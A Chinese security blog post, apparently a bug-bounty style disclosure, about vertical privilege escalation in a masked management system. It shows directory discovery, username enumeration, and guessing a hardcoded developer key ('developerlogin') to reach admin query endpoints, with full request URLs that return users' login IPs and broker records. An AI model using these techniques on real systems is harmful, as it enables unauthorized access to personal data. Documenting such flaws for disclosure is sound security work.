不乱于心,不困于情。
不畏将来,不念过往。如此,安好。

某管理系统存在垂直越权为管理员漏洞

Url:http://****.com/

通过dirsearch得到后台开发者路径

后台开发登录后台之间填写Url进入到开发者功能区域:

http://****.com/developerlogin/

 

对存在的用户进行字典枚举出三名用户,但没有获取到密码

重新截获/deverloplogin/页面,发现payload:key=*****

测试得知三种点击查询有三种接口查询功能:

信息查询

http://****.com/developer?key=****&act=accountQuery&accountQueryType=mobilePhone&accountQueryValue=

http://****.com/developer?key=****&act=accountQuery&accountQueryType=accountName&accountQueryValue=

http://****.com/developer?key=****&act=accountQuery&accountQueryType=accountId&accountQueryValue

登记信息查询

http://****.com/developer?key=****&act=accountLoginQuery&accountQueryType=mobilePhone&accountQueryValue=&loginStartTime=&loginEndTime=

http://****.com/developer?key=****&act=accountLoginQuery&accountQueryType=accountName&accountQueryValue=&loginStartTime=&loginEndTime=

http://****.com/developer?key=****&act=accountLoginQuery&accountQueryType=accountId&accountQueryValue=&loginStartTime=&loginEndTime=

 

经纪人查询同理

http://****.com/developer?key=****&act=brokerQuery&accountQueryType=accountName&accountQueryValue=

经过不断尝试key=****修改后

尝试key=developerlogin得到管理员(开发者)查询权限,垂直越权,进行管理员全局查询。

网页修改url查看存在的11用户:

 

登录信息查询接口

http://****.com/developer?key=developerlogin&act=accountLoginQuery&accountQueryType=accountId&accountQueryValue=123&loginStartTime=20150101&loginEndTime=20210101

获取2015-2021的登录ip地址

经纪人信息查询接口:

http://****.com/developer?key=developerlogin&act=brokerQuery&accountQueryType=accountId&accountQueryValue=123456

提交结果:

源:黑白之道

赞(0) 打赏
未经允许不得转载:seo优化_前端开发_渗透技术 » 某管理系统存在垂直越权为管理员漏洞

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏